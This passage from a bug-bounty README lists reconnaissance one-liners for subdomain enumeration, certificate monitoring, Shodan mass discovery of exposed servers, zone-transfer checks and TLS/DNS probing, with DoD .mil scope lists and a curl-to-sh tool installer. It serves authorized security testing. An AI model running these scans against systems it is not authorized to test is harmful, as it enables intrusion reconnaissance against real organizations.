Full DoD Scope - 19 Domains
# BBRF Scope - All DoD Domains
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'| Military Branches | DoD Agencies | Support Commands |
|---|---|---|
*.af.mil - Air Force |
*.pentagon.mil - Pentagon HQ |
*.dtic.mil - Tech Info Center |
*.army.mil - Army |
*.osd.mil - Office of SecDef |
*.dau.mil - Acquisition Univ |
*.marines.mil - Marines |
*.disa.mil - Defense Info Systems |
*.health.mil - Military Health |
*.navy.mil - Navy |
*.dtra.mil - Threat Reduction |
*.ng.mil - National Guard |
*.spaceforce.mil - Space Force |
*.dla.mil - Logistics Agency |
*.uscg.mil - Coast Guard |
*.ussf.mil - Space Force |
*.dcma.mil - Contract Management |
*.socom.mil - Special Operations |
This repository is for EDUCATIONAL and AUTHORIZED testing ONLY. Always obtain proper authorization before testing.
π Click to read our Security Policy & Guidelines
- β Authorized Bug Bounty Programs - HackerOne, Bugcrowd, Intigriti, etc.
- β Authorized Penetration Testing - With written permission
- β Personal Lab Environments - Your own infrastructure
- β Educational Purposes - Learning and research
- β DoD VDP Program - Following program rules
- β Unauthorized Testing - Testing without explicit permission
- β Malicious Intent - Using techniques for harm or theft
- β Out-of-Scope Testing - Testing targets outside program scope
- β Social Engineering - Unless explicitly allowed in program
- β DoS/DDoS Attacks - Resource exhaustion attacks
- Read the Program Policy - Always review scope and rules
- Test Safely - Don't cause harm to production systems
- Document Everything - Keep detailed notes of your findings
- Report Privately - Use official channels for disclosure
- Give Time to Fix - Allow vendors reasonable time to patch
- Be Professional - Maintain ethical standards
Found a security issue in this repository? Please report it responsibly:
Click to expand navigation
| Section | Description |
|---|---|
| About | Project overview and goals |
| Quick Start | Get started in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope DoD | DoD scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden params |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-to-use scripts |
| Bash Functions | Shell productivity |
| New Oneliners 2026 | CVE-2026 exploits & techniques |
| Oneliners 2024-2025 | Previous techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β π― MISSION STATEMENT π― β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β Share elite bug bounty techniques from world-class hunters β
β Build the most comprehensive one-liner collection β
β Empower the security research community β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Our main goal is to share tips from well-known bug hunters. Using advanced recon methodology, we discover subdomains, APIs, tokens, and vulnerabilities that are exploitable. We aim to influence and educate the community with powerful one-liner techniques for better understanding and faster results.
|
π Curated Commands Battle-tested from real hunters |
π― Full Methodology Recon to exploitation |
π Constantly Updated New techniques weekly |
π Community Driven Top hunters worldwide |
π Click to see detailed statistics
| Category | Count | Status |
|---|---|---|
| One-Liners | 400+ | β Active |
| Techniques | 50+ | β Active |
| Tools Covered | 100+ | β Active |
| CVE Examples | 20+ | β Active |
| DoD Domains | 19 | β Active |
| Contributors | Growing | π Growing |
| Last Update | 2026 | β Current |
|
|
|
|
# π₯ Step 1: Install essential tools (ProjectDiscovery Suite)
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# π Step 2: Run your first reconnaissance chain
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high
# π Step 3: Analyze results and profit!
# Check the output for vulnerabilities and start reporting!π¬ Want a complete automated workflow? Click here!
# π Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"
# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt
# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt
# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt
# π Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)| Tip | Description |
|---|---|
| π | Always get proper authorization before testing |
| π | Keep detailed notes of your findings |
| π οΈ | Start with automated tools, then manual testing |
| π° | Focus on high-impact vulnerabilities first |
| π€ | Join the community and learn from others |
Click to expand complete tool list
| Category | Tools | Installation |
|---|---|---|
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP Probing | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
| Cert Monitoring | Certstream, Certstream-go | pip install certstream |
| DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest |
| Reverse DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest |
| API Discovery | Arjun, x8, ParamSpider | pip install arjun |
| Screenshots | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest |
| Cloud | AWS CLI, CloudEnum, S3Scanner | pip install awscli |
| OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys |
| Git Recon | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest |
| Scope Management | BBRF | pip install bbrf |
# Ubuntu/Debian
sudo apt update && sudo apt install -y \
jq \
curl \
wget \
git \
python3 \
python3-pip \
golang-go \
nmap \
masscan \
chromium-browser \
parallel \
whois \
dnsutils \
libpcap-dev \
build-essential
# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin
# Reload shell
source ~/.bashrc # or source ~/.zshrc#!/bin/bash
# One-click install for all Go tools
echo "[*] Installing Go tools..."
go_tools=(
# ProjectDiscovery
"github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
"github.com/projectdiscovery/httpx/cmd/httpx@latest"
"github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
"github.com/projectdiscovery/katana/cmd/katana@latest"
"github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
"github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
"github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
"github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
# Tomnomnom
"github.com/tomnomnom/waybackurls@latest"
"github.com/tomnomnom/anew@latest"
"github.com/tomnomnom/qsreplace@latest"
"github.com/tomnomnom/unfurl@latest"
"github.com/tomnomnom/gf@latest"
"github.com/tomnomnom/assetfinder@latest"
"github.com/tomnomnom/httprobe@latest"
# Fuzzing & Crawling
"github.com/ffuf/ffuf/v2@latest"
"github.com/jaeles-project/gospider@latest"
"github.com/hakluke/hakrawler@latest"
"github.com/hakluke/hakrevdns@latest"
# Security
"github.com/hahwul/dalfox/v2@latest"
"github.com/lc/gau/v2/cmd/gau@latest"
"github.com/lc/subjs@latest"
# Screenshots & Utils
"github.com/sensepost/gowitness@latest"
"github.com/d3mondev/puredns/v2@latest"
"github.com/j3ssie/metabigor@latest"
"github.com/Emoe/kxss@latest"
"github.com/ferreiraklet/airixss@latest"
"github.com/edoardottt/cariddi/cmd/cariddi@latest"
"github.com/trufflesecurity/trufflehog/v3@latest"
)
for tool in "${go_tools[@]}"; do
echo "[+] Installing $tool"
go install -v "$tool" 2>/dev/null
done
echo "[β] Go tools installed!"#!/bin/bash
# One-click install for all Python tools
echo "[*] Installing Python tools..."
pip3 install --upgrade pip
pip3 install \
certstream \
sqlmap \
ghauri \
uro \
arjun \
paramspider \
shodan \
censys \
bbrf \
dnsgen \
waymore \
xsstrike \
s3scanner \
cloud_enum \
trufflehog
echo "[β] Python tools installed!"#!/bin/bash
# Install Feroxbuster (Rust)
echo "[*] Installing Rust tools..."
# Install Rust if not present
if ! command -v cargo &> /dev/null; then
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source $HOME/.cargo/env
fi
# Install Feroxbuster
cargo install feroxbuster
echo "[β] Rust tools installed!"#!/bin/bash
# Install tools that require cloning
echo "[*] Installing external tools..."
TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR
# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..
# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..
# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/
# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..
# Amass
go install -v github.com/owasp-amass/amass/v4/...@master
# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/
echo "[β] External tools installed!"#!/bin/bash
# MASTER INSTALLER - Run all installation scripts
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
echo "β KingOfBugBounty - Complete Tool Installation β"
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential
# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc
# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master
# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore
# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source $HOME/.cargo/env
fi
cargo install feroxbuster
# Update Nuclei templates
nuclei -update-templates
echo ""
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
echo "β β Installation Complete! β"
echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"#!/bin/bash
# Install essential wordlists
WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR
# SecLists
git clone https://github.com/danielmiessler/SecLists.git
# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH
# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git
# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt
echo "[β] Wordlists installed in $WORDLIST_DIR"#!/bin/bash
# Verify all tools are installed
echo "Checking installed tools..."
tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")
for tool in "${tools[@]}"; do
if command -v $tool &> /dev/null; then
echo "[β] $tool"
else
echo "[β] $tool - NOT FOUND"
fi
done# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'βββββββββββ ββββββββββ βββββββ βββββββ ββββ ββββ ββββββ βββββββ βββ
βββββββββββ βββββββββββββββββββββββββββββββββ βββββββββββββββββββββ βββ
βββββββββββ ββββββββββββββ ββββββ βββββββββββββββββββββββββββββββ βββ
βββββββββββ ββββββββββββββ ββββββ βββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββ βββ ββββββ βββββββββ ββββββ
ββββββββ βββββββ βββββββ βββββββ βββββββ βββ ββββββ βββββββββ βββββ
β οΈ ENUMERATE EVERYTHING β οΈ
# β οΈ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt# β οΈ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent# β οΈ Monitor certificates in real-time for specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"# β οΈ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt# β οΈ Extract all SANs (Subject Alternative Names) in real-time
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt# β οΈ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done# β οΈ Monitor for potential phishing domains (brand impersonation)
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt# β οΈ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done# β οΈ Collect all certificates for specific TLDs
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &# β οΈ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt# β οΈ Real-time certs -> resolve IP -> Shodan lookup
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt# β οΈ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json# β οΈ Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &# β οΈ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high# π Locate Clawdbot servers exposed on the internet
shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt# π Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"# π Detect Clawdbot via User-Agent strings
shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt# π Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt# π Extract detailed server info from Clawdbot hosts
shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt# π Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt# π Find Clawdbot by country for geo-targeted testing
for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done# π Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt# π Extract Clawdbot hosts with SSL certificate info
shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt# π Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &# β οΈ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anewsubfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt# β οΈ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt
# β οΈ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt
# β οΈ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt
# β οΈ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt
# β οΈ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txtgithub-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt# β οΈ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt# β οΈ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt# β οΈ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt# β οΈ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt# β οΈ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt# β οΈ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt# β οΈ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt# β οΈ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt# β οΈ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt# β οΈ THE ULTIMATE SUBDOMAIN HUNTER β οΈ
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt# β οΈ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt# β οΈ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt# β οΈ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt# β οΈ Find related hosts via favicon hash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt# β οΈ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.comββββββββββββ βββββββββββ βββ βββββββ ββββββββ βββββββ βββββββ ββββ βββ
ββββββββββββ ββββββββββββββββ ββββββββββββββββββββββββββββββββββββββ βββ
βββ βββ ββββββββ ββββββ ββββββββββββββ βββ βββ βββββββββ βββ
βββ βββ ββββββββ ββββββ ββββββββββββββ βββ βββ βββββββββββββ
βββ ββββββββββββββββββββ βββ βββ βββββββββββββββββββββββββββββββ ββββββ
βββ βββββββββββββββββββ βββ βββ βββββββββββ βββββββ βββββββ βββ βββββ
π TLS/SSL Certificate Intelligence with TLSX π
# π Full TLS certificate details extraction
echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt# π Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt# π Find hosts with expired SSL certificates
cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt# π Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt# π Find hosts with deprecated TLS versions (TLS 1.0/1.1)
cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt# π JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt# π Analyze certificate chain and identify CA
cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt# π Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt# π Find certificates where CN doesn't match the hostname
cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt# π Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.jsonβββββββ ββββ ββββββββββββββ βββ βββββββ ββββββββ βββββββ βββββββ ββββ βββ
βββββββββββββ βββββββββββββββββββ ββββββββββββββββββββββββββββββββββββββ βββ
βββ βββββββββ βββββββββββ ββββββ ββββββββββββββ βββ βββ βββββββββ βββ
βββ βββββββββββββββββββββ ββββββ ββββββββββββββ βββ βββ βββββββββββββ
βββββββββββ ββββββββββββββββββ βββ βββ βββββββββββββββββββββββββββββββ ββββββ
βββββββ βββ ββββββββββββββββ βββ βββ βββββββββββ βββββββ βββββββ βββ βββββ
π DNS Reconnaissance & Intelligence Gathering with DNSX π
# π Resolve subdomains and filter out wildcards
subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt# π Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt# π Find dangling CNAMEs pointing to vulnerable services
subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt# π Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt# π Extract MX records to identify mail servers and SPF bypass opportunities
cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt# π Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt# π Mass DNS brute-force with custom resolver list
cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt# π Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json# π Resolve domains, extract unique IPs, and identify ASN ownership
